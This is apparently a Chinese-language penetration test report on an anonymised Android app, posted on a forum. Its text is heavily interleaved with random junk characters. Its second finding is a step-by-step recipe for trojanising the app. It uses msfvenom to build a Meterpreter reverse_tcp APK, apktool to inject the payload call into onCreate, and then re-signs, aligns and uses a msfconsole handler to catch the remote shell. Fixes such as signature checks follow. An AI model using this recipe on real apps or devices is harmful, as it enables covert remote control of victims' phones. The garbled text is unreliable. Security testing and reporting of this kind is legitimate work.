9 x; k/ K( ]: @& U- z; l+ L; {# L, ~" u ]3 |4 {1 X

9 D2 `- M# o( p/ ~4 s6 x + ?* o2 x0 q: \) {1 f   " K% W2 j! c6 J. P- W- w+ B 6 a! J5 u( |6 b! @% I- j

+ A0 @" R, E# `1 B5 }8 |! f ~9 }/ r1 v1 N# e' r+ I

' O# M8 W" }1 H% e) W0 |) ~& g% r* O( Z 1-2 测试结果 . U; ~1 L( @: a. K2 ^ c; D 2 ^3 j8 a2 y) U- o8 I8 E

( x& T2 y+ j5 p1 z1 a7 Z ^8 W$ O- o* m7 ^: s C# J- ~1 w

4 o7 t, l1 B& b7 g! j' Y. c ) Y1 \- R( A: _% v6 u G   % l9 j O. S9 h9 p) ]4 b) ], [5 ~4 U8 z8 ?$ V

4 U/ A6 F F5 y) s6 [ 7 {/ J: T6 j7 {2 n

7 ^( H' ~; |# j6 E ) `3 S: B4 B3 h, t! g1 g4 Q8 k 2 检测结果                    4 o. w3 W3 z9 t3 L - `/ b. {, c: N, m& u3 C$ P* k% a

}: W; | V, p# g3 u( G9 m+ t 4 X+ X% G$ K$ d& Z2 g: x

5 F0 K7 r7 A$ j- {! ]! E ( C7 f( G% q, d/ s$ w* }! v 2.1 某某某 - S, g y O0 }0 E) {( }# f" P+ l) |. i) K+ ]

1 Z4 n( H8 ^/ f: b ) f( E6 h* u. F: l8 w1 r0 _

* }2 f5 ~5 H; o, N. n. K# I 9 R. S# X, B2 A( u& O 2.1.1检测目标 P3 z) ^7 ?6 ~4 D' n* ~: a$ `' z 9 }) G" g- I; Z8 G

0 h- N1 @# f7 E, P( o4 D! N, P7 C . B0 F: G0 h' O) t/ U

) H1 M4 ]* G- G: c- A8 x ' s" y/ i, M& y/ e; f5 Q+ B 目标地址: 某某某某某某APP 8 g+ C1 H1 n& f 8 r4 O3 l! e# d9 u0 ~

0 c2 i' |( \$ b8 o $ C# r. J: ]! q% g- k4 n

1 {* e% ^: |+ X- X, I / o: c6 H$ U- W0 |) B" t 2.1.2检测结果 " P8 B0 ]2 _0 o) u, @2 U & N: P; K+ E i4 @7 v

6 J4 ^ ~5 w9 C; M! U, p J" d4 Y3 T2 Y, ~$ ?

; \4 F/ {& `' A7 u# H6 g( D) n8 `% @( A" w$ ]. _" m# | 2.1.2.1 ) O5 I. l' w6 F # b8 {7 B8 z* u3 _

0 y0 O( t8 F; s+ g+ \) E5 _/ I; _ * ~% l5 ~$ ^3 c, V

5 h- k6 R w3 n) {. {8 N8 g/ T- C( e1 h9 H 漏洞链接地址:某某某某某某APP 2 H5 x$ M+ |; m* ~: Y5 [0 g0 S" U. `% b/ \$ e; X- l, u O' g7 s$ D& B

' q5 z N# v! ^0 P 2 |0 \; }0 t) O; ]( z N- {

' l0 ^ L% P) w: H ) ?% K1 p9 B: i4 K   ; ~ g( R3 N8 r6 e; U" g0 m8 [" T* K& ?; l6 C# Q

* K8 y! ?% P4 _1 d6 h s5 u9 a" G* n# J

5 p. g: P, Z1 ]2 i9 L a* a d9 x* R, ?+ X( A, | 漏洞分析及取证: 3 V( W5 ?+ ^; F . @# N" y' F$ U+ l- y1 y" b: `

3 [& W' U% N# [" F , I" u. B8 V5 f2 t# z: J

! q! `( V( F) G2 L+ V : ^. l4 N* _! n' ] t% D" X                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ' a& Y# O9 R1 y. k- T4 [2 X. \6 c3 a4 x. ?$ d# S8 T2 }. m

) Z& Z6 t9 K0 n9 P6 ~. A+ Y; o 0 A X4 x q& F5 `8 M \

) ]9 X, p1 ]0 i: a4 x, N& b( N      1 o4 f& s- `' _8 ]; n8 [& t( S8 R% j4 p' X2 R. S( E* |

3 I! j$ A v/ L7 R3 U, u 8 o5 a) W3 L5 G$ l7 z+ y/ m- ?6 N

9 Y( s. j" f' g / l8 f5 P& H) h1 f                       ; |# @4 i+ A0 q0 F+ t8 B D " P5 [: X/ ]# T% g3 i. u

7 ^5 r. o: ~! x7 Z" T1 C' Q' t" L- f9 K% d0 @$ w, c

/ O: ~4 b$ f2 R6 t4 B! r8 a4 M+ | B8 h+ z' z: | 3 D. C# L7 c* X- Z7 H: j 3 Z; U V3 @# w& R1 c

: W# }# [1 l7 `" f% F- x, p& f! X8 B& t; U, w# t

3 z4 o) Z4 @4 W, `1 t- d2 K v* R6 H8 F 5 L; Q4 l4 r6 L4 U: b8 z" C2 W # K5 s* Q. [0 W# x, U: ?: @* D

; Q, l: Y! U9 y0 M4 G # t$ e* |" s6 ~: {) b" t1 d! c1 x8 K* |

( a! E: ^; O5 `; ^/ n 7 U- s6 V5 {4 R4 r8 }2 N T ( B+ O, u3 ]: @" ^ " ~8 y A, w2 @

* l' L+ C/ |' H" g / J. p' T% s' G: G9 K7 \; _

9 r- `% q. B+ g7 N9 K( Q( t 0 n7 b' e, f8 j- f 漏洞危害:高 * J: Z5 G5 z( Q" ~3 h 0 s+ ^4 Z6 Y) u9 x! [1 E' U

3 B3 Q( d) Y+ | 3 W% r$ I, `4 j0 ]4 f) d9 w
% o( b9 A2 |. H5 E, x$ w' A& F3 z S 7 B8 c, W0 L; d) v2 @3 v0 r; i, _$ O) t- v* \/ R$ f" w* O) E/ }2 w5 n8 c1 l! n! W* n- j) T* R3 A a8 ^# y1 F# {* a7 e1 K2 K' Y4 O* m# D0 W; ^9 g h4 x8 y$ R& X5 ]6 L) Q/ R# F0 g% l7 T; ]# K1 h: w! d9 X# {6 l- C# M, t0 ~; M, ^! R9 W7 U, Q" `( u4 H0 _+ E8 W" W6 j. y& p5 A; i. y3 P) L1 g0 r; J. h# b5 K- J9 v7 B& X6 ~4 z5 N6 F" t1 L8 C; A+ | z" K7 q' w( i3 P& D7 \% M( R4 \4 R9 Z6 f9 P! k6 b8 F, l+ X2 a5 H# ~( C! r, t+ _, i+ `4 L5 g3 k( B: Y+ G" O" Z" ]3 R0 |) R3 J% W# l7 K" ^8 B$ k& ^8 i! F+ f# X! L! t% R+ u# ]( `$ Q) F# ~& A$ _. O$ a1 P5 O* e u6 t6 }7 T+ k. V3 U3 x% m4 ]$ L; G
4 I: J( l& g, z' E- R7 q- z5 K* Q, r

" C0 `+ K0 ?3 A7 x' b K 2 D% Q' a, [' |" W) o 严重程度 ) T# s! m+ P4 I G# ?+ V% ` + T- ~9 W; H& Y+ B

4 v6 H) M0 l0 `6 Z$ p! N& I D# e9 ^4 s7 j" [8 q 		) q5 v8 o4 b$ y. c! n5 [ X9 | ) c. l$ Q( L( t' \; ^; ]

* B4 O; U+ P I/ x* H * O$ A9 f, r+ g% a" x9 y, H# f 7 P* E1 l6 `, {+ u/ |( P1 k) E6 y* V+ D+ o

2 n1 l6 R% h* C# T! n( ^8 f & c3 G$ y: M' ?* m5 b 		. G3 [$ M% `4 a! c' k, ? % U3 E2 } t @- C9 o* y

1 I5 J7 F% q/ L9 i9 ] 0 d: N/ F4 b8 W* @7 _ , x/ @$ h0 g: L$ M6 ?8 `- v" k3 V2 X! t2 g' r4 p) n. ^

% d4 W9 A. b* Z9 ?$ i3 Z7 y3 s* `+ \* t 		# w$ o0 U/ U& a9 g 6 q8 s% O" X; N+ f) ~

7 ~5 U" d( ^: i . ~; e) {3 K' U/ c1 w* D2 L 5 \5 N: g! ?3 P6 \7 f$ P2 j. U8 M0 c2 `1 `

& L, {* S7 {1 F1 o h: D - |% c6 N: k. } 		* A7 w0 r1 V4 j3 [+ @' z6 e - t' d# V; K/ E$ {3 K( e% g G

" m A- m) c6 N% d 2 }, T; \8 R' w9 u4 e! z' Y   % J- o) b8 @2 b2 I/ Y8 M / V$ w3 B( a; [. Z& _ e

3 g6 e) H$ \( k; C/ ?5 Q; I 3 _7 q9 L4 [6 N8 B' D2 D( e 		4 H' t; W, b. k 5 d) V- a5 W( J" l* T) m

5 ]9 d3 W9 g l) K7 N# u5 A. r H2 U, G8 `/ U, N 5 y* S( u, J# `3 j- i% H9 D# x/ @0 \: l

, V# X8 R! \: {; S0 C * ]1 c; p8 F9 m5 T 		4 j* G) E" w. l+ @; ~& G# T6 p: K

: m& O! ^8 l% F X8 q0 \( S# C4 F2 [5 V7 \$ y   # [6 l, u6 w3 u. Q0 B. l# L' m' ~1 {" ^) F& m) [! s

( I) ?4 u3 l& ^4 R1 R3 B6 `+ T 5 C8 g9 I5 Q, f# M
1 x: \" o% M& E( L* y / C2 `% {& I3 d! r
* q4 H; i+ { ` 8 C+ L* w' A7 s0 P

9 A5 G. i7 [1 y' d, o( T! d t O4 m+ _7 R$ l$ L2 K9 G! Q' m/ F# F   # x- ~8 F* s8 P( {2 Z) t, H 6 p8 ^ a. a. `4 t3 ]' m4 P

% h& x8 d# O/ F: k' j3 U( N1 ^5 d0 k# ~% H h

$ r% H. i2 Z8 S3 A/ U6 x4 @ ) C+ M) f- F- [ 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 , N" ?- a9 W* G: |) {+ R# C0 ?, z" D4 ~6 C( m

( [6 Z, p! d! f* U7 {4 R ( T+ z- j g4 M. u

0 y' ^/ I# \6 k. d2 \ 7 ]% Y- b# Q$ r           , j1 l; ~ K6 V( K5 c/ ` ! J2 q q1 |# s" W

9 f5 H+ n' `+ n- A& g9 m# V5 z# a+ _8 b( {; Z

& ] P% l* Z& d% w 0 J4 S) X# o) O' ?4 E }- _   6 _" L0 X- g% m& k2 M5 ] . J0 q5 [# U0 h: d

- f, _# u Y7 F2 I5 c% @3 x |1 _2 `' y7 Q/ u' \; l

1 _. R9 z, Z6 K2 O: v & r: Z# r' o% L# |5 ~1 S7 Q 2.1.2.2 ' C f) N5 P$ U) p 3 f6 q4 a" p; N! ]8 ~% Z7 w8 b

. s' \# z3 ~* `5 i3 p: C5 g9 ?1 k* h5 c. Q7 o6 Y

9 l& E: X: |7 Q$ s7 \' \ : N% W1 `6 N& r& ? 漏洞链接地址:某某某某某某APP : ~- s# i3 m2 | 4 l! X h5 l) N4 |) K

/ [7 b: O5 k) y' a$ i" h6 U9 t% m

$ w! A4 Z$ @4 T! T% G% P" \( k, G/ O1 b# A" R% H) ? 漏洞分析及取证: % L9 b* @- N: s) @2 E8 k+ Z! F 9 q0 u4 t& S3 e+ R1 p1 d* N

) a' P9 N+ E: S4 C$ s8 @& N+ w # b) y9 A3 A3 k4 }

. }4 R/ R/ L6 F 0 N% B( W6 F. t/ {$ R% k                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 _4 m" C* g( O& h i- w8 r# c( J9 k p1 g \0 W

+ g0 W1 B7 t% {) t, R& a0 z1 s5 y 1 w( n1 _, v/ e# I4 m8 m* V

! ?) R2 N0 N. \$ I& n; J1 _& Z# O( k7 b2 k Metasploit 生成木马 apk 8 |* k7 L) p" G; u( ^: ]+ U . }' N, E, J1 }) R! W

; K" U4 K# G% a3 A5 u$ v6 m" r1 I8 {1 Y7 K4 F

3 Q" H Z+ S# ^ ! f* s& u5 D+ y& f: @2 N' N" U msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ' w8 u. {! J, D' g; ~1 Q5 z % @4 ~& V7 a) H* }; F% a% B

! h1 V4 m3 _( U$ Z" n) h% ^ 4 v! d7 g8 b# [6 u' n

8 a2 T6 s( X9 \! L" c6 a3 E8 I/ N" b: l' K4 a1 [ 反编译目标apk和木马apk ' D# P6 V* M" X* Q2 ^# G8 w) d4 P ~+ h5 K x1 g

) G, k5 C8 z0 `' Q N: _6 M4 j! t7 d h3 v5 r: O9 B4 \

& Q X5 u! L& L& v % @" m0 Z, s0 i4 [( @6 y apktool d target.apk
4 w# }6 _. l w1 J& O 6 P& k9 [' y; _) O( Z1 B apktool d cockhorse.apk / m# @, `, s5 I/ P9 v) Q ]. E, k 5 k8 U% I5 L5 l0 N9 j

: z, e& S8 U' g) v$ p) y+ k+ b& c" }, S; s% R* p) k1 {7 X

! N# Y" S5 y! m7 Z4 ?) \# H+ ]2 }3 X7 {/ n$ p, ^1 L4 X+ { 木马 apk 注入目标 apk : s7 D, A9 B( W- k/ t8 P. v3 s9 K; A; Y) b5 m" j

6 Z j, a3 d/ Y* @ 4 C! {3 G/ h9 p# O9 l8 n

|& w) U% O+ C l' l/ y : V) t, {% f5 n, M1 Y# N$ O 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
' O. v' y* o# a5 x! e7 u" } : k0 r. k, d* y8 E. t) h) J, U invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ! e1 s& j/ l7 n: ~ 8 `, t- B) R9 b

7 B: w; d/ O7 k( V# }) r, M! I1 x1 l0 e6 Q$ k* N u

: Y @5 W: |) k/ v7 ^$ h" c7 ` 6 {4 u' e) j) L' q' ?) v 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 / d; } D% q& | o9 Y' G' B. b/ j1 U

! T! Q( i$ i! V, u# D8 u5 @ ; |! j7 n( Z. ^1 y' j! S. l

% ~; W2 t K5 v ' _+ v7 f2 }, q/ Q4 F3 ]# Y% { 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ / I- ~, S+ q( A1 t0 K7 p& w- ?& K ) ?- v# F) z3 i, H

! C: {! g: p& |* t# M 3 x( k( H: v: Z9 z

/ Q! E! T6 x1 F : s0 c8 I2 [" S9 R- W: q5 n 回编译生成最终 apk 7 M9 K- O2 ~2 a( o8 f * k+ L0 H0 L( Y2 F

`/ F6 }% p8 Z1 w( I - z7 j- R5 R) v# I: V6 f, Z* j

+ N- ^# l. h* m/ a$ a* z$ `& s 5 B" n' t2 E3 O- h5 g1 V9 R& s 重新打包 # \% K( G% ~& n: b7 u t1 n) ?/ G # H/ k- [. K+ R

' [0 [, A2 b+ q* |0 P P ; q d7 ]- @5 u8 q0 ?( G

9 [( }1 X/ ^& `2 n- }# z 7 j8 n- o# o; v; H8 d0 i- q' r apktool b -o repackage.apk target_app_floder & P# W7 B3 W- n5 T; _ 4 D! n& t8 D1 E; _ \5 I6 V

v; y: p6 W/ j7 [ 3 J. B. W H8 l; M

0 ?4 h6 ]" ]9 i- |' O7 ? & a4 s. p# Y( u" v! _: { _/ n% S6 W! P. a: N 创建签名文件,有的话可忽略此步骤 " e# q0 S8 p4 m& g% n ; T9 ]/ J! e" W; Z' i5 r

- M6 M2 w) S5 z" ]5 f & C2 _: }6 Y. F Y7 S

9 T2 Z3 C1 i0 g+ M- N 8 _9 w1 z' I' k8 J: W# `0 \8 D keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                + S8 N, x t3 ~: J . N2 ~9 i1 o3 p. ^

! c9 ~7 z7 z) {# @; b9 G! y" f d 1 i3 } q+ H% |0 D: N4 L: `, H, N/ o

- x/ c! W6 h' ]% ? p * M" S+ r. S# u* W7 X 签名,以下任选其一 " \$ y" j8 B* `& _: e; e6 c9 m' P, x$ ]4 [

4 [7 N0 `2 j0 f, N * g- I! D# {8 {: Q: Z

2 ^+ D8 ^1 N; y, H+ z( x7 T4 Q; k. r4 I* w* b) R7 G! ~9 j jarsigner 方式 & W5 u) P' M1 M. A+ I + |: E- {7 n( r) C

( T4 |& A8 f9 i" m; u9 }6 r1 t. z( k: C$ i/ v. E5 P3 O' Y

3 d! x) u% j- {% L2 ^/ u8 ^+ S d( ^9 X9 U# a/ k jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname - `5 F# ?! Z; A % M6 |; |# P% H# N( J

+ L- Q: Z5 S% q+ ?; A1 S 5 n- ?: g* {' f

$ O4 {: D& j; a( X9 t' D9 `: G, P0 H3 `2 L! j! @- u) A apksigner 方式 8 `. X& b8 k3 K- ]& V( s, f* e$ ` ' Q: \# r( `) c! Z9 i

$ Q2 a5 }8 R2 D. u . K8 ~- l+ a2 O+ b' D' r/ q7 @% a

" L: m8 ?& ^: v - \7 s V; d* k; r apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk : h' w4 _2 v9 J : O! Z- Z6 [0 h/ j( P5 t" z) j

! \0 M2 w# Y' O. Q# S: t $ S2 u/ p/ `) ~8 v+ M

3 R9 [" L' [( Z; |& { ' o0 `; c# b: I# Q 如需要禁用 v2签名 添加选项--v2-signing-enabled false 0 n' Z. {1 ]% P5 H0 B4 s4 g 5 u9 @' y6 d S9 T* Y* l

' H9 g: r$ P* p% H1 [% G8 D 1 n/ Y; n( N" g* o

1 ?: a8 a: ^5 b. `* H% [ : o( Q1 f( k; b6 D+ {3 J 验证,以下任选其一 9 } e& B( Z3 l V+ I 5 b m) H: }' g: Z) m

+ k; O. [# M% H& s8 y ) S7 r+ T0 n: F7 Q0 O% m8 v

4 B8 O F5 I- { 3 F* N! u% p- ~& }! m( G+ @# `. k) O jarsigner方式 # {8 h& H; b1 S; e2 ^8 B X6 `/ I8 x. a( O

J5 h$ O' E" H% M $ Y) `2 V) ~9 u, n: q3 t+ G

" t o9 x* R* E1 \; y: B4 N9 n* i/ q2 Z; B* l. O/ a jarsigner -verify repackaged.apk , l4 ^# Q& Y; ?) `1 h/ h 1 I1 c$ @+ I4 b! L

; b4 A4 W2 F' F3 z/ X- u Z7 d5 r" M! B$ M4 u

6 k* X$ e+ Z. }" p, g$ j 6 r8 Y7 R$ W3 h; }' G5 N apksigner 方式 . w0 k0 P U: E$ ~ - P5 q- E# v" N; L$ c& c

, T8 h' E4 {5 ? P6 E; {6 O* U. B2 K

* G! E) [ q6 ^( d/ r8 I; m# h, f " A0 i' X4 K8 ^8 s; \ apksigner verify -v --print-certs repackaged.apk ; q* G% \. r7 i% |- C# D% V ) K7 |' `0 _! K \" e

! a( l3 u; s5 B! g" Z. H9 V" F4 P+ S+ W" r) n1 q3 T

2 C% y5 V; V/ ~( b* e4 @+ j$ n+ c4 l& f3 U& m keytool方式 6 x! o9 ~# o. f [* z9 x8 S2 J m8 D0 e. B

+ j. K( u8 x: G$ X/ ^% O6 N! w% j + h6 \' {0 c. b: G$ a. e! ?% B( J

8 g9 D" |& U$ @( K. |( S% [+ ~ ( ~, L, I" O5 P% ^ keytool -printcert -jarfile repackaged.apk " |' ?% S' ^. M4 H9 Z! l! y) W0 w* y2 }4 f+ v- f( x: |7 P

8 j* F0 k Z. r+ _& ?; o1 }1 N2 ~ - l b9 D$ l. u. w' C% K

- s, N( K+ R" g7 H 6 y$ N0 \* p0 g) l0 z" R$ p 对齐 % k; Z6 _3 d3 H u( ]9 ~ 1 |& ~% z; d: u# ^( m2 f

: Y+ q4 G" b. u9 [6 w, ` 1 N' @1 P) R ]5 `

4 a$ _% v; ^2 q4 H; |/ v4 ]; r6 L ?* \ v v4 j" W 字节对齐优化 3 S$ T9 I4 j( V8 `& N4 ~7 W ( ?# E: j1 X1 t

" o: A) N. E4 x/ O2 R0 @1 v0 K; `; Y. g; E1 A# b

# t4 W R3 K+ J+ P0 H! ` : H# _2 e" d2 K zipalign -v 4 repackaged.apk final.apk : D7 E/ B( B/ Q J$ d' K7 J. v# a/ B ` U/ ^

a8 q. [: H4 J5 T5 ]$ M5 n8 m ! Q5 K9 h- {8 C

6 x x4 _. x. F & Q" v1 l8 \- h: J5 K 检查是否对齐 # q: _* S* ?' Q# Z& A ; y# }; p1 B7 ] l

) I2 L4 o/ a0 H/ _6 o2 D7 } w7 P) R& W* Q' h8 t

3 e0 y! \* S4 f+ I; F# ?# d$ [ 9 V$ \; E5 W/ h6 y+ Z zipalign -c -v 4 final.apk & B8 `1 ]0 Q( P( M y! m 5 [% t0 u; O1 W' M

3 v9 R' @' f' T # [9 t% \ k0 I; J) G

0 x8 p! A- ^1 p; x( b' c) n' i " q3 F3 T" U' M- r# e8 c 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 r' a/ D$ n/ H# e) v ) H$ o" H# t3 ~3 u

1 a+ d6 g* G2 W" G3 m : S/ ?+ Y& z( e5 l8 W

) v3 e5 P- B- |5 E2 M * f- T3 u$ J6 N; u" S! {; r 启动Metasploit控制台,配置参数等待上线 8 e3 w* T* @* X# ] 4 p7 Q1 D4 L7 E/ w5 Z2 u8 }: W

3 ^/ s# \4 U7 l" P" `. D2 X' N4 ] B# D( S! |# Q% h1 P* j1 B: X

! ] m0 t4 k- k: L! h - F$ g0 y! D. t- S7 e 在终端依次输入如下命令 ( t! b! y' C }' k5 W 9 |- R* M3 J, y. Q2 D

. Z/ U2 H8 N b1 s$ R! e # T, ?6 y# h& f) F: P8 L1 w2 Z; |

: j- K- K2 k4 W. J( Z t : Y/ k/ U4 z6 j3 G% x G, h msfconsole + L" N8 U- V, V5 {6 U! S, t5 u H % j4 o1 M+ Y4 g7 c1 I, U2 ~

! r: ?& g, ` Y) I* G $ H0 x6 U+ }, V: a& h5 W1 L

$ f, @: t- b8 d$ O. K3 K. J7 O b4 g9 J- `1 _, Q" t use exploit/multi/handler 6 M0 z3 `9 g0 D0 c4 _ 3 X$ a1 i3 W( d( b

; M0 ]3 }% f0 M' [# ? & _" ^0 V* n4 Z% G( u" I0 Y

% \$ d' `1 p0 W* w; h8 f & s; k# i! y$ A; m' [+ \ set PAYLOAD android/meterpreter/reverse_tcp 7 L% m' }7 W5 z- N( y0 t, } ' n' E8 Q; S$ T* k

0 y2 p$ I7 @3 Q1 E* w* `- w 8 ~" m- c( P0 @9 ]

, U- H* o8 W* S' N1 O( I & @: X! X; t# C8 [ set LHOST 192.xxx.xx.xx d$ V7 N" r# |$ z/ D& t) o# X% z % ?: O4 @2 U6 ], ]: B7 S

$ Z7 `/ L) k" ]. n7 }7 E* g ' U! ?/ K; q X! f. h8 \* M+ S

7 s D2 w- ?. S- t. ?5 t% v- Y$ l ' F: l! L% A0 W" i( o2 M set LPORT 4444 0 u9 f1 L; U5 O: s3 j3 D* i/ K+ g6 O. r

& ^! a6 ~# H. f& h " L* P# `! V6 e+ G! u

7 d7 b6 y/ B# R6 y# w; ? $ h: H) E# @% m1 d X0 k exploit ; r( `2 o* b" Q% ?, t- J 0 t& \# i5 T, Q8 }

- U) S6 N+ f: _ 6 @2 d$ i6 ?' q' }0 S- ?

2 E9 L1 o/ u* n- Y; r7 }. q) {: J( M* Y A$ h( K+ { 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ( _/ W/ j3 _* }5 L ' Y) I8 C% \) m/ L+ a+ R4 m

' L5 [; D$ q1 ~7 I4 \ N$ J! x0 H# M# I+ l o

/ Y1 }6 e8 _/ r& D6 `" ?- ~: M, I: l/ u2 C 漏洞危害:中 ) N0 e, m4 j8 b ! C- ?8 _! A, U$ Q- G

) B# K! f( I: X8 k1 n! Y* o: y5 K# M/ k# k6 D
+ I0 |+ t' P& v$ Y( d4 V/ K L/ z 1 y& a- q3 b% g4 r8 J4 B ; ?# ` K& a. _, g4 O* [6 x 4 H* {; L8 B9 ^4 ? 1 B" v& o8 k% g& |6 V/ s* [7 @5 {6 o. p7 K8 C: P6 S+ y2 ]. o* t$ g: e6 L U! n% X% d( J' c7 E; j i: y- c6 P+ Y9 A( E& G: C! H: ]. o G; ?! h- I. Y9 i! f2 A# c9 v" t. s7 e8 V, m# }$ N1 w: f' D$ m4 x! F1 N: G% H% a0 x- q- L! j8 s2 d6 p/ i& v4 p+ Z4 I# @: a& `! E9 P) U5 y: b( c, y' h* q$ A( p5 E& [$ R3 K) n* t3 {. b& _9 m- R9 @; a6 U& i6 p; n- n! D/ d1 q1 {- F. ]( l/ p* Z/ ^; m0 Z7 S6 D9 h s/ z6 i9 r* q1 e' c- G1 P! r: l. m1 o* U0 P1 j. A: ^1 _! K- M1 T6 J4 ~: l' {: m2 ~9 u$ c) O/ N) n) |5 z2 P; Z: V" h" j- ]" x) I. D. j) ^% X& v
6 _# Q1 [1 X" b/ p$ k 1 k! @5 R9 C0 I( u5 z# n( F

! `# }* y( t* @0 g( F+ \) P {6 B9 C" m/ f6 B! P3 [7 x/ z 严重程度 5 d% y( P; e7 | 9 E; w9 f3 l8 t* @7 ^* V

4 w5 U4 M; q, _, W+ ]3 u, l/ O9 O " {% B; o* I" R6 e+ U e 		% ^7 s" L/ j; }4 @+ X. D, P7 G: }; ]

; V! Y5 v6 f0 \1 }% P3 i. H K6 w $ u- k8 |/ k* t2 _+ W$ o h' y" D / F5 }- K' n% o7 H+ |4 u: O - r6 L% m) M9 M5 K; n

) c: F' f; u7 w1 f2 P( u7 C) K/ Y + F6 C0 D1 A8 U8 U/ L7 S( m" D 		. f) n% j' [5 \6 x. q5 W0 o1 X" R: f+ t0 |; F( o {3 ?

" T- C" Z: y( R% _ 3 F: A5 j: P" @' Q 6 T6 {. }" u1 L7 E1 ]( `& V0 r' } - y3 O3 T: {, V- E' j+ Q

1 G" c" ~4 r6 B% S1 W! N) Q ! N& l; i5 @2 `8 V2 n 		4 C+ Z/ ^( b: V* z2 k! \. Z & W" q0 C' P. Q: L0 \

: K6 W! n% e# B9 j B K1 g- {2 K ; ]3 ?3 x) n- Z* L/ Q. r ( i- F7 ^! [4 q& c V # @. ~% }9 G& {

( u! A) j- ?; G4 Q& o& w ( b! d0 r- t* p- ~/ S 		3 V6 _; J+ @' e! V7 x* l" K 0 y" q% b" a! E. ?5 q$ f* B! W: h ' l% A) U" Z) O; ?+ `5 E, ~$ I, w - ?: u' ]. i7 r0 D# i# F: r

% R. K8 x K* K' M6 r0 c S! _$ W   ( E: l; _8 V5 Z' e! p. {0 E( l5 C4 R" s0 `

2 y/ j; L5 `. I5 Q% R$ t" [1 Y) ?5 S% z$ a3 R- ^: j 		: u: {; r J# ^" D 6 g1 X( L4 I: m- g# @7 I. g0 S1 b

& c0 h. U1 D0 L. [1 A# ^8 u' d . E1 f4 m1 y& o( z$ b5 q ! p& G! N. d! }% S

, [) q1 H/ t% ]- t# w E$ G. L% P( B% ? 		# h5 `+ `4 G+ Z! E/ o s( m , z6 w, j7 h% W/ q+ _ + a+ I' x/ }: n% b: M& ] 2 I4 ~; M6 w7 m

9 A1 C5 Y" Y& a- W: h* @/ k" C / v3 T w: c. U1 q& N( _   8 p6 b; v2 K. P6 P4 v: Q+ ?- l7 F* h E

P/ T7 S, n. E+ d8 B , z3 J" u9 } m5 b
0 w$ o' Q# I. u( W p9 ]9 F* I" v% v; Q
" B, c6 k8 X2 P2 i2 n7 D$ Z, |2 @. A' }8 M6 a/ e

) @! |% w1 D. [7 T6 I7 l2 U+ S, P; h& Z- `$ r$ R   3 p- e6 }& Q' ^8 d9 ]4 v 1 [- p; Z3 [ B+ e: z

) z; T7 n7 L. V( [ a & j; ~; O; N0 k! Z. D/ ]

7 G6 u$ g+ W) W! r 1 @# c. A( N( u5 `0 E 修复方法: $ m7 r# L* I! q0 q4 H& F 0 Z4 C0 ?6 I8 x- u4 D

9 Z. c5 P, ~9 l" C/ f : Z9 Q0 G1 {& x. l! X

4 _0 T& ?0 e( h * ?0 k2 D5 Z7 h+ Q               1. APP 启动时应做签名校验防止二次打包。
. ]' q4 [& q- H3 ]. t- I/ ~ ! ]) ~; P; {9 f+ o/ K 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ( B4 [% a' w4 x) m# o" K# M: i7 P' U* N5 C 7 l2 F0 D2 ?4 p. z& G- ~6 d# i( s

; Y9 K0 \/ {: P * a' Y% o. p s' B 2 U \% i/ i! G' \ 4 M; m, `( `- \, ^+ F

8 k$ v. _9 [) G7 W & t& v! N; \0 ?: [* w; S   7 c2 b; j+ X" e8 F, S2 ~' r 4 l8 U/ I0 d6 s9 Z( P: V% W

6 o ]# e" K8 _: Y. R3 {3 l' m7 E% Y R 4 b# u- r0 S7 S9 ~ 6 H; f( r/ `# e4 M

1 E4 A; `; Z& J $ ? T9 p- Z0 l
; B! A0 O* S r3 m* ?* c' {8 F: x( [( W( g

, f. @$ v; V% u/ l' ? $ `. G3 A" [: y1 P" R7 `$ R! `
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表